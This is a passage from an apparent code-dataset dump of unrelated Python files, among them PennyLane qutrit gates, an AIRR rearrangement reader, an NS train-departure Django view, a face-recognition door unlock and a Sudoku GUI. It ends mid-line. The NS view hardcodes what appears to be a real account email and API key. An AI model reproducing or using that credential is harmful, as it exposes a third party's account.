single-qutrit basis states which the operator acts on\n\n This property returns the 2D subspace on which the operator acts if specified,\n or None if no subspace is defined. This subspace determines which two single-qutrit\n basis states the operator acts on. The remaining basis state is not affected by the\n operator.\n\n Returns:\n tuple[int] or None: subspace on which operator acts, if specified, else None\n \"\"\"\n return self._subspace\n\n @staticmethod\n def compute_matrix(subspace=None): # pylint: disable=arguments-differ\n r\"\"\"Representation of the operator as a canonical matrix in the computational basis (static method).\n\n The canonical matrix is the textbook matrix representation that does not consider wires.\n Implicitly, this assumes that the wires of the operator correspond to the global wire order.\n\n .. seealso:: :meth:`~.THadamard.matrix`\n\n Args:\n subspace (Sequence[int]): the 2D subspace on which to apply operation. This should be\n `None` for the generalized Hadamard.\n\n Returns:\n ndarray: matrix\n\n **Example**\n\n >>> print(qml.THadamard.compute_matrix(subspace=(0, 2)))\n array([[ 0.70710678+0.j, 0. +0.j, 0.70710678+0.j],\n [ 0. +0.j, 1. +0.j, 0. +0.j],\n [ 0.70710678+0.j, 0. +0.j, -0.70710678+0.j]])\n \"\"\"\n\n if subspace is None:\n return (-1j / np.sqrt(3)) * np.array(\n [[1, 1, 1], [1, OMEGA, OMEGA**2], [1, OMEGA**2, OMEGA]]\n )\n\n mat = np.eye(3, dtype=np.complex128)\n\n unused_ind = list({0, 1, 2}.difference(set(subspace))).pop()\n\n mat[unused_ind, unused_ind] = np.sqrt(2)\n mat[subspace[0], subspace[1]] = 1\n mat[subspace[1], subspace[0]] = 1\n mat[subspace[1], subspace[1]] = -1\n\n return mat / np.sqrt(2)\n\n @property\n def has_adjoint(self): # pylint: disable=arguments-renamed, invalid-overridden-method\n return self.subspace is not None\n\n def adjoint(self):\n if self.subspace is None:\n raise AdjointUndefinedError\n return THadamard(wires=self.wires, subspace=self.subspace)\n\n def pow(self, z):\n new_exp = z % 4 if self.subspace is None else z % 2\n return super().pow(new_exp)\n","repo_name":"PennyLaneAI/pennylane","sub_path":"pennylane/ops/qutrit/non_parametric_ops.py","file_name":"non_parametric_ops.py","file_ext":"py","file_size_in_byte":17504,"program_lang":"python","lang":"en","doc_type":"code","stars":1965,"dataset":"github-code","pt":"52"} +{"seq_id":"25170186116","text":"import pandas as pd\nimport datetime\n\nCITIES = [\"Las Vegas\", \"Charlotte\", \"Pittsburgh\", \"Toronto\"]\nDATE_LOWER = datetime.datetime.strptime(\"2012-10-01 13:00:00\", \"%Y-%m-%d %H:%M:%S\")\nDATE_UPPER = datetime.datetime.strptime(\"2017-11-30 00:00:00\", \"%Y-%m-%d %H:%M:%S\")\n\nreview = pd.read_csv(\"./processed/yelp_review.csv\", parse_dates=[\"date\"], infer_datetime_format=True, index_col=0)\n\nfor city in CITIES:\n busy_id = pd.read_csv(\"./processed/buisness/\" + city + \".csv\", usecols=[\"business_id\"])[\"business_id\"]\n review[(review[\"date\"] >= DATE_LOWER) & (review[\"date\"] <= (DATE_UPPER - pd.DateOffset(hours=12))) & review[\"business_id\"].isin(busy_id)].reset_index(drop=True).to_csv(\"./processed/review/\" + city + \".csv\")","repo_name":"prototypicalpro/PythonWorkspace","sub_path":"YelpWeather/gen_review_data.py","file_name":"gen_review_data.py","file_ext":"py","file_size_in_byte":720,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"40309032587","text":"\"\"\"\nReference library for AIRR schema for Ig/TCR rearrangements\n\"\"\"\nfrom __future__ import print_function\nimport sys\nimport csv\nfrom airr.schema import RearrangementSchema, ValidationError\n\n\nclass RearrangementReader:\n \"\"\"\n Iterator for reading Rearrangement objects in TSV format\n\n Attributes:\n fields (list): field names in the input Rearrangement file.\n external_fields (list): list of fields in the input file that are not\n part of the Rearrangement definition.\n \"\"\"\n @property\n def fields(self):\n \"\"\"\n Get list of fields\n\n Returns:\n list : field names.\n \"\"\"\n return self.dict_reader.fieldnames\n\n @property\n def external_fields(self):\n \"\"\"\n Get list of field that are not in the Rearrangement schema\n\n Returns:\n list : field names.\n \"\"\"\n return [f for f in self.dict_reader.fieldnames \\\n if f not in self.schema.properties]\n\n def __init__(self, handle, base=1, validate=False, debug=False):\n \"\"\"\n Initialization\n\n Arguments:\n handle (file): file handle of the open Rearrangement file.\n base (int): one of 0 or 1 specifying the coordinate schema in the input file.\n If 1, then the file is assumed to contain 1-based closed intervals\n that will be converted to python style 0-based half-open intervals\n for known fields. If 0, then values will be unchanged.\n validate (bool): perform validation. If True then basic validation will be\n performed will reading the data. A ValidationError exception\n will be raised if an error is found.\n debug (bool): debug state. If True prints debug information.\n\n Returns:\n airr.io.RearrangementReader: reader object.\n \"\"\"\n # arguments\n self.handle = handle\n self.base = base\n self.debug = debug\n self.validate = validate\n self.schema = RearrangementSchema\n\n # data reader, collect field names\n self.dict_reader = csv.DictReader(self.handle, dialect='excel-tab')\n\n def __iter__(self):\n \"\"\"\n Iterator initializer\n\n Returns:\n airr.io.RearrangementReader\n \"\"\"\n # Validate fields\n if (self.validate):\n self.schema.validate_header(self.dict_reader.fieldnames)\n\n return self\n\n def __next__(self):\n \"\"\"\n Next method\n\n Returns:\n dict: parsed Rearrangement data.\n \"\"\"\n try:\n row = next(self.dict_reader)\n except StopIteration:\n raise StopIteration\n\n for f in row:\n # row entry with no header\n if f is None:\n if self.validate:\n raise ValidationError('row has extra data')\n else:\n raise ValueError('row has extra data')\n\n # Convert types\n spec = self.schema.type(f)\n try:\n if spec == 'boolean':\n row[f] = self.schema.to_bool(row[f], validate=self.validate)\n if spec == 'integer':\n row[f] = self.schema.to_int(row[f], validate=self.validate)\n if spec == 'number':\n row[f] = self.schema.to_float(row[f], validate=self.validate)\n except ValidationError as e:\n raise ValidationError('field %s has %s' %(f, e))\n\n # Adjust coordinates\n if f and f.endswith('_start') and self.base == 1:\n try:\n row[f] = row[f] - 1\n except TypeError:\n row[f] = None\n\n return row\n\n def close(self):\n \"\"\"\n Closes the Rearrangement file\n \"\"\"\n self.handle.close()\n\n def next(self):\n \"\"\"\n Next method\n \"\"\"\n return self.__next__()\n\n\nclass RearrangementWriter:\n \"\"\"\n Writer class for Rearrangement objects in TSV format\n\n Attributes:\n fields (list): field names in the output Rearrangement file.\n external_fields (list): list of fields in the output file that are not\n part of the Rearrangement definition.\n \"\"\"\n @property\n def fields(self):\n \"\"\"\n Get list of fields\n\n Returns:\n list : field names.\n \"\"\"\n return self.dict_writer.fieldnames\n\n @property\n def external_fields(self):\n \"\"\"\n Get list of field that are not in the Rearrangements schema\n\n Returns:\n list : field names.\n \"\"\"\n return [f for f in self.dict_writer.fieldnames \\\n if f not in self.schema.properties]\n\n def __init__(self, handle, fields=None, base=1, debug=False):\n \"\"\"\n Initialization\n\n Arguments:\n handle (file): file handle of the open Rearrangements file.\n fields (list) : list of non-required fields to add. May include fields undefined by the schema.\n base (int): one of 0 or 1 specifying the coordinate schema in the output file.\n Data provided to the write is assumed to be in python style 0-based\n half-open intervals. If 1, then data will be converted to 1-based\n closed intervals for known fields before writing. If 0, then values will be unchanged.\n debug (bool): debug state. If True prints debug information.\n\n Returns:\n airr.io.RearrangementWriter: writer object.\n \"\"\"\n # arguments\n self.handle = handle\n self.base = base\n self.debug = debug\n self.schema = RearrangementSchema\n\n # order fields according to spec\n field_names = list(self.schema.required)\n if fields is not None:\n additional_fields = []\n for f in fields:\n if f in self.schema.required:\n continue\n elif f in self.schema.optional:\n field_names.append(f)\n else:\n additional_fields.append(f)\n field_names.extend(additional_fields)\n\n # open writer and write header\n self.dict_writer = csv.DictWriter(self.handle, fieldnames=field_names, dialect='excel-tab',\n extrasaction='ignore', lineterminator='\\n')\n self.dict_writer.writeheader()\n\n def close(self):\n \"\"\"\n Closes the Rearrangement file\n \"\"\"\n self.handle.close()\n\n def write(self, row):\n \"\"\"\n Write a row to the Rearrangement file\n\n Arguments:\n row (dict): row to write.\n \"\"\"\n # validate row\n if self.debug:\n for field in self.schema.required:\n if row.get(field, None) is None:\n sys.stderr.write('Warning: Record is missing AIRR required field (' + field + ').\\n')\n\n for f in row.keys():\n # Adjust coordinates\n if f.endswith('_start') and self.base == 1:\n try:\n row[f] = self.schema.to_int(row[f]) + 1\n except TypeError:\n row[f] = None\n\n # Convert types\n spec = self.schema.type(f)\n if spec == 'boolean': row[f] = self.schema.from_bool(row[f])\n\n self.dict_writer.writerow(row)\n\n\n# TODO: pandas validation need if we load with pandas directly\n# def validate_df(df, airr_schema):\n# valid = True\n#\n# # check required fields\n# missing_fields = set(airr_schema.required) - set(df.columns)\n# if len(missing_fields) > 0:\n# print('Warning: file is missing mandatory fields: {}'.format(', '.join(missing_fields)))\n# valid = False\n#\n# if not valid:\n# raise ValueError('invalid AIRR data file')\n\n\n","repo_name":"airr-community/airr-standards","sub_path":"lang/python/airr/io.py","file_name":"io.py","file_ext":"py","file_size_in_byte":7940,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"52"} +{"seq_id":"41551904134","text":"from datetime import date, datetime\nfrom django import template\n\nregister = template.Library()\n\n\n@register.filter(name='age')\ndef get_age(value):\n if not value:\n return None\n d = map(int, value.split(\"-\"))\n dob = datetime(d[0], d[1], d[2])\n today = date.today()\n return today.year - dob.year - ((today.month, today.day) < (dob.month, dob.day))\n","repo_name":"varshinim/drchrono","sub_path":"drchrono/templatetags/extras.py","file_name":"extras.py","file_ext":"py","file_size_in_byte":366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37895419416","text":"from django.shortcuts import render\n# Create your views here.\nfrom django.views import View\n\nfrom nsapi import NSApi\n\n\nclass IndexView(View):\n def get(self, request):\n # Create the API wrapper\n apiwrapper = NSApi(\"527188@student.glu.nl\", \"pd6lcTRQk3UXIy5KgRUi1qR6gCBCeBZuocc4vuNajaKi6I9G2D6gmQ\")\n\n # Get the departures\n gutt = apiwrapper.get_departures(\"ut\")\n\n # Edit some information\n for train in gutt:\n gutt[train][\"departure_time\"] = gutt[train][\"departure_time\"].strftime(\"%H:%M\")\n gutt[train][\"comments\"] = \"\\n\".join(gutt[train][\"comments\"])\n if gutt[train][\"route\"]:\n gutt[train][\"via_text\"] = \"via {}\".format(gutt[train][\"route\"])\n else:\n gutt[train][\"via_text\"] = \"\"\n\n # Get the disruptions\n badd = apiwrapper.get_disruptions(actual=True)\n\n # Render the HTML template\n return render(request, \"Display/home.html\", {\n \"gutt\": gutt,\n \"badd\": badd\n })\n\n\n","repo_name":"tassilovermeulen/NS-dash","sub_path":"Display/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1035,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"41970024114","text":"import face_recognition\nimport cv2\nimport glob, os\nimport serial\nfrom multiprocessing import Process\nfrom threading import Thread\nimport _thread\nfrom gtts import gTTS\n\ndef welcome(name):\n welcomeMessage = False\n\n mytext = 'Welcome ' + name\n\n language = 'en'\n myobj = gTTS(text=mytext, lang=language, slow=False)\n\n myobj.save(\"welcome.mp3\")\n os.system(\"mpg321 welcome.mp3\")\n\n\n\nser = serial.Serial('/dev/tty.usbmodem1421', 9600)\n\n\nowd = os.getcwd()\n\n# Get a reference to webcam #0 (the default one)\nvideo_capture = cv2.VideoCapture(1)\n\n## Prof. Dr. Slim Abdennadher\nos.chdir('pics/ProfSlim')\n\npics = glob.glob('*.jpg')\n\nknown_face_encodings = []\nknown_face_names = []\n\n# Load sample pictures and learn how to recognize it.\nfor pic in pics:\n img = face_recognition.load_image_file(pic)\n encoding = face_recognition.face_encodings(img)\n if len(encoding) > 0:\n img_encoding = face_recognition.face_encodings(img)[0]\n known_face_encodings.append(img_encoding)\n known_face_names.append('Prof. Dr. Slim Abdennadher')\n\n## Prof. Dr. Ashraf Mansour\nos.chdir(owd)\nos.chdir('pics/ProfAshraf')\n\npics = glob.glob('*.jpg')\n\n# Load sample pictures and learn how to recognize it.\nfor pic in pics:\n img = face_recognition.load_image_file(pic)\n encoding = face_recognition.face_encodings(img)\n if len(encoding) > 0:\n img_encoding = face_recognition.face_encodings(img)[0]\n known_face_encodings.append(img_encoding)\n known_face_names.append('Prof. Dr. Ashraf Mansour')\n\n# Initialize some variables\nface_locations = []\nface_encodings = []\nface_names = []\nknown_person = False\nisFirstTime = True\nwelcomeMessage = False\nprocess_this_frame = True\ncolor = (0, 0, 0)\n\nwhile True:\n # Grab a single frame of video\n ret, frame = video_capture.read()\n\n # Resize frame of video to 1/4 size for faster face recognition processing\n small_frame = cv2.resize(frame, (0, 0), fx=0.25, fy=0.25)\n\n # Convert the image from BGR color (which OpenCV uses) to RGB color (which face_recognition uses)\n rgb_small_frame = small_frame[:, :, ::-1]\n\n # Only process every other frame of video to save time\n if process_this_frame:\n # Find all the faces and face encodings in the current frame of video\n face_locations = face_recognition.face_locations(rgb_small_frame)\n face_encodings = face_recognition.face_encodings(rgb_small_frame, face_locations)\n\n face_names = []\n for face_encoding in face_encodings:\n # See if the face is a match for the known face(s)\n matches = face_recognition.compare_faces(known_face_encodings, face_encoding)\n name = \"Unknown\"\n\n # If a match was found in known_face_encodings, just use the first one.\n if True in matches:\n first_match_index = matches.index(True)\n name = known_face_names[first_match_index]\n known_person = True\n\n face_names.append(name)\n\n process_this_frame = not process_this_frame\n\n # Display the results\n for (top, right, bottom, left), name in zip(face_locations, face_names):\n # Scale back up face locations since the frame we detected in was scaled to 1/4 size\n top *= 4\n right *= 4\n bottom *= 4\n left *= 4\n\n if name == \"Unknown\":\n color = (0, 0, 225)\n else:\n color = (0, 255, 0)\n\n\n # Draw a box around the face\n cv2.rectangle(frame, (left, top), (right, bottom), color, 2)\n\n # Draw a label with a name below the face\n cv2.rectangle(frame, (left, bottom - 35), (right, bottom), color, cv2.FILLED)\n font = cv2.FONT_HERSHEY_DUPLEX\n cv2.putText(frame, name, (left + 6, bottom - 6), font, 1.0, (255, 255, 255), 1)\n\n ## Unlock with Arduino\n if isFirstTime and known_person:\n if name == \"Unknown\":\n break\n # print('Unlocking for: ' + name)\n cv2.putText(frame, \"Welcome \" + name, (left - 100, bottom + 50), font, 1.0, (0, 255, 0), 1)\n i = 5\n while i > 0:\n ser.write(b'1')\n i -= 1\n if ser.readline() == b'1\\r\\n':\n known_person = False\n # isFirstTime = False\n break\n\n\n\n # Display the resulting image\n cv2.imshow('WhoAmI', frame)\n\n # Hit 'q' on the keyboard to quit!\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n# Release handle to the webcam\nvideo_capture.release()\ncv2.destroyAllWindows()\n","repo_name":"AmrMKayid/whoami","sub_path":"whoami.py","file_name":"whoami.py","file_ext":"py","file_size_in_byte":4561,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"28571709766","text":"\"\"\"\n对邻近的像素点进行灰度排序,然后取中间值,它能有效去除图像中的椒盐噪声\n\n操作原理: 卷积域内的像素值从小到大排序 取中间值作为卷积输出\n\"\"\"\nimport cv2\n\n\nimg = cv2.imread('../data/888157224.jpeg', cv2.IMREAD_COLOR)\ncv2.imshow('img', img)\n\nmid = cv2.medianBlur(img, 3)\ncv2.imshow('mid', mid)\n\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n\n\n\n\n\n","repo_name":"happy426/learn","sub_path":"opencv/图片卷积/中值滤波.py","file_name":"中值滤波.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"5731369179","text":"h, m = map(int, input().split())\nt = int(input())\n\nm += t\n\nif m >= 60:\n time_m = m // 60\n h += time_m\n m -= (time_m * 60)\n\nif h >= 24:\n h -= 24\n\nprint(h, m)","repo_name":"BangDori/python-algorithm","sub_path":"baekjoon/2525.py","file_name":"2525.py","file_ext":"py","file_size_in_byte":168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72388846246","text":"import pickle\nimport json\nfrom functools import partial\n\nimport torch\nimport pytorch_lightning as pl\nfrom torch.utils.data import DataLoader, Dataset\nfrom transformers import AutoTokenizer\n\n\nclass CSLDailyImpl(Dataset):\n def __init__(\n self,\n samples,\n gloss_vocabs\n ):\n super().__init__()\n\n self.samples = samples\n self.gloss_vocabs = gloss_vocabs\n self.tokenizer = AutoTokenizer.from_pretrained(\"bert-base-chinese\")\n\n def __len__(self):\n return len(self.samples)\n\n def __getitem__(self, idx):\n sample = self.samples[idx]\n sentence, gloss_seq = sample[\"sentence\"], sample[\"gloss_seq\"]\n\n results = self.tokenizer(\n sentence,\n padding=\"max_length\",\n max_length=64,\n truncation=True,\n return_tensors=\"pt\",\n )\n input_ids = results[\"input_ids\"].squeeze(0)\n attention_mask = results[\"attention_mask\"].squeeze(0)\n\n gloss_ids = [101] + [\n self.gloss_vocabs[gloss]\n for gloss in gloss_seq\n ] + [102]\n if len(gloss_ids) < 64:\n gloss_ids += [0] * (64 - len(gloss_ids))\n gloss_ids = torch.as_tensor(gloss_ids, dtype=torch.int64)\n\n return input_ids, attention_mask, gloss_ids\n\n\nclass CSLDaily(pl.LightningDataModule):\n def __init__(\n self,\n train_batch_size: int = 64,\n val_batch_size: int = 64,\n test_batch_size: int = 64,\n num_workers: int = 8,\n ) -> None:\n super().__init__()\n\n self.train_batch_size = train_batch_size\n self.val_batch_size = val_batch_size\n self.test_batch_size = test_batch_size\n self.num_workers = num_workers\n\n def setup(self, stage: str) -> None:\n samples = {}\n with open(\"data/CSL-Daily/sentence_label/csl2020ct_v2.pkl\", \"rb\") as f:\n annos = pickle.load(f)\n gloss_vocabs = {\n vocab: i + 106\n for i, vocab in enumerate(annos[\"gloss_map\"])\n }\n with open(\"data/CSL-Daily/gloss_vocabs.json\", \"w\") as f:\n json.dump(gloss_vocabs, f, ensure_ascii=False)\n\n for info in annos[\"info\"]:\n samples[info[\"name\"]] = {\n \"gloss_seq\": info[\"label_gloss\"],\n \"sentence\": \"\".join(info[\"label_char\"]),\n \"split\": \"train\",\n }\n\n with open(\"data/CSL-Daily/sentence_label/split_1.txt\") as f:\n _ = f.readline()\n while True:\n line = f.readline()\n if not line:\n break\n name, split = line.strip().split(\"|\")\n if name in samples:\n samples[name][\"split\"] = split\n\n self.train_samples = [\n sample for sample in samples.values() if sample[\"split\"] == \"train\"\n ]\n self.val_samples = [\n sample for sample in samples.values() if sample[\"split\"] == \"dev\"\n ]\n self.test_samples = [\n sample for sample in samples.values() if sample[\"split\"] == \"dev\"\n ]\n\n self.train_dataset = CSLDailyImpl(self.train_samples, gloss_vocabs)\n self.val_dataset = CSLDailyImpl(self.val_samples, gloss_vocabs)\n self.test_dataset = CSLDailyImpl(self.test_samples, gloss_vocabs)\n\n def train_dataloader(self):\n return DataLoader(\n self.train_dataset,\n batch_size=self.train_batch_size,\n shuffle=True,\n num_workers=self.num_workers,\n pin_memory=True,\n )\n\n def val_dataloader(self):\n return DataLoader(\n self.val_dataset,\n batch_size=self.val_batch_size,\n shuffle=False,\n num_workers=self.num_workers,\n pin_memory=True,\n )\n\n def test_dataloader(self):\n return DataLoader(\n self.test_dataset,\n batch_size=self.test_batch_size,\n shuffle=False,\n num_workers=self.num_workers,\n pin_memory=True,\n )\n","repo_name":"Cherrling/Gesture_Vision","sub_path":"generate/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":4091,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"18585765432","text":"#!/usr/bin/env python\nimport os\nfrom glob import glob\nimport argparse\n\nEXT = ['*_CODE.bin','*_DATA.bin','*_BSS.bin','*_UNASSIGNED.bin','*.lis','*.map','*.def','*.err,','*.ticks_history.txt','*.sym']\nEXT_ALL = ['zf_lib.lib','*.bin','*.ram','*.rom','*.com','*.COM','*.o']\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--all\", action='store_true', help=\"Remove all intermediate files\")\n args = parser.parse_args()\n\n for e in EXT + EXT_ALL if args.all else EXT:\n for f in glob(os.path.join(os.getcwd(), f\"**/{e}\"), recursive=True):\n os.remove(f)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"tangent3D/Z-FIGHTER","sub_path":"software/clean.py","file_name":"clean.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"52"} +{"seq_id":"33421763805","text":"from PyQt5.QtGui import QFont\nfrom PyQt5.QtWidgets import QMainWindow, QCheckBox, QTextEdit, QPushButton\n\n\nclass SudokuGUI(QMainWindow):\n \"\"\"The class used to create the Sudoku GUI.\n\n This class is responsible for the GUI elements of the program.\n It is not responsible for functionality of the program, for example it\n creates the buttons but does not decide what the buttons do.\n\n Attributes:\n cells: Each Sudoku cell/node as a QPushButton.\n king_check: QCheckBox for king constraint to be enabled.\n knight_check: QCheckBox for knight constraint to be enabled.\n check_text: QTextEdit used to display information to the user.\n generate_btn: QPushButton used to pseudo generate a unsolved Sudoku board.\n undo_btn: QPushButton used to undo the latest actions performed by the user.\n clear_btn: QPushButton used to clear the entire board.\n solve_btn: QPushButton used to solve the board.\n \"\"\"\n def __init__(self, *args, **kwargs):\n super(SudokuGUI, self).__init__(*args, **kwargs)\n\n self.move(700, 250)\n self.setFixedHeight(462)\n self.setFixedWidth(620)\n self.setStyleSheet(\"background-color: black;\")\n self.setWindowTitle(\"Sudoku\")\n\n self.cells = []\n\n self.check_text = QTextEdit(self)\n self.check_text.setReadOnly(True)\n self.check_text.move(465, 255)\n self.check_text.resize(150, 150)\n self.check_text.setStyleSheet(\"background-color: lightblue;\")\n self.check_text.setText(\"\")\n\n self.knight_check = QCheckBox(self)\n self.knight_check.resize(75, 25)\n self.knight_check.move(465, 5)\n self.knight_check.setText(\"Knight\")\n self.knight_check.setChecked(False)\n self.knight_check.setStyleSheet(\"background-color: #33afff;\")\n\n self.king_check = QCheckBox(self)\n self.king_check.resize(75, 25)\n self.king_check.move(540, 5)\n self.king_check.setText(\"King\")\n self.king_check.setChecked(False)\n self.king_check.setStyleSheet(\"background-color: #33afff;\")\n\n self.generate_btn = self._create_button(465, 35, \"Generate\")\n self.undo_btn = self._create_button(465, 90, \"Undo\")\n self.clear_btn = self._create_button(465, 145, \"Clear\")\n self.check_btn = self._create_button(465, 200, \"Check\")\n self.solve_btn = self._create_button(465, 410, \"Solve\")\n\n self._create_board()\n\n def _create_board(self):\n \"\"\"Arithmetically creates a Sudoku board of QPushButtons.\"\"\"\n size = 50\n margin = 1\n\n for row in range(9):\n cell_row = []\n for column in range(9):\n cell = QPushButton(\"\", self)\n\n tmp_x = 0\n tmp_y = 0\n\n if column >= 3:\n tmp_x += 2\n\n if column >= 6:\n tmp_x += 2\n\n if row >= 3:\n tmp_y += 2\n\n if row >= 6:\n tmp_y += 2\n\n cell.setFont(QFont(\"Callibri\", 28))\n cell.resize(size, size)\n cell.move((size + margin) * column + tmp_x, (size + margin) * row + tmp_y)\n cell.setStyleSheet(\"background-color: white; border: 1px solid black;\")\n cell_row.append(cell)\n\n self.cells.append(cell_row)\n\n def _create_button(self, x, y, text):\n \"\"\"Create a button with the same style.\n\n Args:\n x: The x-position of the button.\n y: The y-position of the button.\n text: The text on the button.\n\n Returns:\n The button as a QPushButton element.\n \"\"\"\n button = QPushButton(self)\n button.setText(text)\n button.move(x, y)\n button.resize(150, 50)\n button.setStyleSheet(\"background-color: #33afff;\")\n\n return button\n","repo_name":"JonOlav95/algorithm_x","sub_path":"interface/gui_parent.py","file_name":"gui_parent.py","file_ext":"py","file_size_in_byte":3898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"27427195472","text":"'''\nScript for load data files for machine learn main software\nversion: v1.0 \n'''\nimport sys\nimport numpy as np\nimport pandas as pd\nimport os\nimport random as random\nimport time\nimport datetime\nimport matplotlib.pyplot as plt\nfrom PyQt5 import QtWidgets, QtCore\n\n\nclass DataFileError(Exception):\n \"\"\"Data file error\"\"\"\n\n def __init__(self, message, *args):\n \"\"\"Initialize variables\"\"\"\n self.message = message\n\nclass Main_Script(object):\n \"\"\"Rotating coil file data\"\"\"\n def __init__(self):\n self.file = np.array([])\n \n \n def load_files(self):\n \"\"\"Load input database\"\"\"\n try:\n app=QtWidgets.QApplication.instance()\n if not app:\n app = QtWidgets.QApplication(sys.argv)\n file_path = QtWidgets.QFileDialog.getOpenFileNames()\n self.files = self.sort_list(file_path[0])\n #self.DataFile()\n return True\n except:\n return False\n \n def sort_list(self,list):\n \"\"\"Sort data by input date, avoiding wrong information\"\"\"\n index = np.array([])\n for i in range(len(list)):\n index = np.append(index, time.mktime(datetime.datetime.strptime(list[i][list[i].find('.dat')-13:list[i].find('.dat')], '%y%m%d_%H%M%S').timetuple()))\n index = index.argsort()\n\n _file_List = np.array([])\n for i in range(len(list)):\n _file_List = np.append(_file_List,list[index[i]])\n\n return _file_List\n \n def _search_in_file_lines(self, lines, search_str, alt_search_str=None):\n \"\"\"Search individual infos from each data\"\"\"\n found_in_file = np.where(np.char.find(lines, search_str) > -1)\n if len(found_in_file) == 0 and alt_search_str is not None:\n found_in_file = np.where(\n np.char.find(lines, alt_search_str) > -1)[0]\n if len(found_in_file) != 0:\n index = found_in_file[0][0]\n else:\n index = None\n return index\n \n def DataFile(self):\n \"\"\" Rotating coil file data\"\"\"\n self.Data = np.array([])\n n = len(self.files)\n for i in range (n):\n self.Data = np.append(self.Data, Main_Script())\n self.Data[i].file = self.files[i]\n arq = open(self.Data[i].file)\n self.Data[i].Raw = np.array(arq.read().splitlines())\n \n #Parse filename\n filename_split = (os.path.split(self.Data[i].file)[1].split('.')[0].split('_'))\n \n #Read Magnet Name\n index = self._search_in_file_lines(self.Data[i].Raw, 'file', 'arquivo')\n if index is not None:\n self.Data[i].magnet_name = (\n self.Data[i].Raw[index].split('\\t')[1].split('\\\\')[-1].split('_')[0])\n else:\n self.Data[i].magnet_name = filename_split[0]\n \n #Read Date\n index = self._search_in_file_lines(self.Data[i].Raw, 'date', 'data')\n if index is not None:\n self.Data[i].date = (\n self.Data[i].Raw[index].split('\\t')[1].split('\\\\')[-1].split('_')[0]) \n else:\n if len(filename_split) > 1:\n self.Data[i].date = filename_split[-2]\n \n #Read Hour\n index = self._search_in_file_lines(self.Data[i].Raw, 'hour', 'hora')\n if index is not None:\n self.Data[i].hour = (\n self.Data[i].Raw[index].split('\\t')[1].split('\\\\')[-1].split('_')[0])\n else:\n if len(filename_split) > 2:\n self.Data[i].hour = filename_split[-1]\n \n #Read Measure Number\n index = self._search_in_file_lines(self.Data[i].Raw, 'analysis_interval', 'intervalo_analise')\n if index is not None:\n self.Data[i].measure_number = (\n self.Data[i].Raw[index].split('\\t')[1].split('-'))\n \n #Read Number of Measures Used to Calculate the Mean Value\n index = self._search_in_file_lines(self.Data[i].Raw, 'n_turns', 'nr_voltas')\n if index is not None:\n self.Data[i].measure_number_mean = self.Data[i].Raw[index].split('\\t')[1]\n \n #Read Temperature\n index = self._search_in_file_lines(self.Data[i].Raw, 'temperature', 'temperatura_ima')\n if index is not None:\n self.Data[i].temperature = self.Data[i].Raw[index].split('\\t')[1]\n \n #Read encoder start pulse\n index = self._search_in_file_lines(self.Data[i].Raw, 'pulse_start_collect', 'pulso_start_coleta')\n if index is not None:\n self.Data[i].start_pulse = self.Data[i].Raw[index].split('\\t')[1]\n \n #### Take Currents ####\n \n # Read main current\n index = self._search_in_file_lines(self.Data[i].Raw, 'main_coil_current_avg', 'corrente_alim_principal_avg')\n if index is not None:\n self.Data[i].main_current = float(self.Data[i].Raw[index].split('\\t')[1])\n \n index = self._search_in_file_lines(self.Data[i].Raw, 'main_coil_current_std', 'corrente_alim_principal_std')\n if index is not None:\n self.Data[i].main_current_std = float(self.Data[i].Raw[index].split('\\t')[1])\n\n # Read Trim Current\n index = self._search_in_file_lines(self.Data[i].Raw, 'trim_coil_current_avg', 'corrente_alim_secundaria_avg')\n if index is not None:\n self.Data[i].trim_current = float(self.Data[i].Raw[index].split('\\t')[1])\n\n index = self._search_in_file_lines(self.Data[i].Raw, 'trim_coil_current_std', 'corrente_alim_secundaria_std')\n if index is not None:\n self.Data[i].trim_current_std = float(self.Data[i].Raw[index].split('\\t')[1])\n\n # Read CH Current\n index = self._search_in_file_lines(self.Data[i].Raw, 'ch_coil_current_avg')\n if index is not None:\n self.Data[i].ch_current = float(self.Data[i].Raw[index].split('\\t')[1])\n\n index = self._search_in_file_lines(self.Data[i].Raw, 'ch_coil_current_std')\n if index is not None:\n self.Data[i].ch_current_std = float(self.Data[i].Raw[index].split('\\t')[1])\n\n # Read CV Current\n index = self._search_in_file_lines(self.Data[i].Raw, 'cv_coil_current_avg')\n if index is not None:\n self.Data[i].cv_current = float(self.Data[i].Raw[index].split('\\t')[1])\n\n index = self._search_in_file_lines(self.Data[i].Raw, 'cv_coil_current_std')\n if index is not None:\n self.Data[i].cv_current_std = float(self.Data[i].Raw[index].split('\\t')[1])\n\n # Read QS Current\n index = self._search_in_file_lines(self.Data[i].Raw, 'qs_coil_current_avg')\n if index is not None:\n self.Data[i].qs_current = float(self.Data[i].Raw[index].split('\\t')[1])\n\n index = self._search_in_file_lines(self.Data[i].Raw, 'qs_coil_current_std')\n if index is not None:\n self.Data[i].qs_current_std = float(self.Data[i].Raw[index].split('\\t')[1])\n \n #print(self.Data[i].main_current)\n \n self._get_multipoles_from_file_data()\n \n def _get_multipoles_from_file_data(self):\n n = len(self.files)\n i=0\n for i in range (n):\n index = self._search_in_file_lines(\n self.Data[i].Raw, 'Reading Data', 'Dados de Leitura')\n if index is not None:\n index_multipoles = index + 3\n multipoles_str = 